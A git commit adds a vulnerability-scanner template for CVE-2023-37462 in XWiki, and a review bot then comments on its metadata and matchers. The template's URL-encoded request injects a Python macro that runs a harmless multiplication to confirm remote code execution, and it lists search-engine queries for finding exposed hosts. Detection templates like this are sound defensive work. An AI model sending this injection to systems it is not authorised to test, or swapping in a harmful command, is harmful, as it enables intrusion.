Create CVE-2023-37462.yaml
parent
dc1addda06
commit
ae14c1dc03
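--- /dev/null
+++ b/CVE-2023-37462.yaml
@@ -0,0 +1,42 @@
+id: CVE-2023-37462
+info:
+name: XWiki Platform Remote Code Execution
+author: parthmalhotra, pdresearch
+severity: critical
+reference:
+- https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29
+- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg
+- https://jira.xwiki.org/browse/XWIKI-20457
+metadata:
+max-request: 2
+verified: true
+shodan-query: html:"data-xwiki-reference"
+fofa-query: body="data-xwiki-reference"
+
+http:
+- method: GET
+path:
+- "{{BaseURL}}/wiki/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view"
+- "{{BaseURL}}/wiki/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"
+
+cookie-reuse: true
+skip-variables-check: true
+extractors:
+- type: regex
+part: body
+group: 1
+internal: true
+name: id
+regex:
+- data-xwiki-async-client-id="(.+?)"
+- type: regex
+part: body
+group: 1
+internal: true
+name: url
+regex:
+- <span class="xwiki-async" data-xwiki-async-id="(.+?)"
+matchers:
+- type: word
+words:
+- "31557644536232"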
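Review bot: The `info` block stops at `reference` and `metadata`, so a hit rated `critical` is reported with no `description`, `classification`, `remediation` or `tags`, which leaves triage without a CVE mapping or a fix pointer. I would add `classification:` with `cve-id: CVE-2023-37462`, a `remediation:` line that points at the GHSA-h4vp-69r8-gvjg advisory already listed under `reference`, and `tags:` so the template can be selected by CVE. Separately, the single `word` matcher names no `part` and is not paired with a status check; `part: body` would make the intent explicit. Both paths hard-code the `/wiki/` prefix and `wiki=xwiki`, which presumably misses installs served under another context path, so a negative result should not be read as proof that the host is patched.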